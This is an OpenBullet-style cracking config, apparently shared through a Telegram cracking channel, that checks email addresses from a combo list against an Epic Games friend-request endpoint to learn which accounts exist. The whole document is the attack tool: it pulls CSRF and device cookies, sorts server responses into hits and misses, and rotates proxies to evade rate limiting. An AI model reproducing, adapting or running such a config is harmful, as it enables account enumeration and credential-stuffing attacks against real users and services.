[SETTINGS]
{
  "Name": "EPIC games VM",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-03-12T17:10:29.7455346+02:00",
  "AdditionalInfo": "https://t.me/crackforce",
  "Author": "@CONFIG_COMBO",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://www.epicgames.com/id/api/csrf" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<COOKIES[*]>" LR "EPIC_DEVICE," ")," -> VAR "1" 

PARSE "<COOKIES[*]>" LR "XSRF-TOKEN," ")," -> VAR "2" 

FUNCTION GenerateGUID -> VAR "ID" 

REQUEST GET "https://accounts.launcher-website-prod07.ol.epicgames.com/launcher/sendFriendRequest?inputEmail=<USER>&tab=Requests" 
  
  HEADER "EPIC_DEVICE: <1>" 
  HEADER "EPIC_FUNNEL_ID: <ID>" 
  HEADER "XSRF-TOKEN: <2>" 
  HEADER "X-XSRF-TOKEN: <2>" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Origin: https://accounts.launcher-website-prod07.ol.epicgames.com" 
  HEADER "Referer: https://accounts.launcher-website-prod07.ol.epicgames.com/launcher/addFriends" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "class=\"fieldValidationError\">Please Sign In</label></div>" 
  KEYCHAIN Failure OR 
    KEY "class=\"fieldValidationError\">Sorry, this account was not found</label></div>" 
    KEY "Sorry, you are visiting our service too frequent" 

FUNCTION Constant "@CONFIG_COMBO" -> CAP "Config By" 

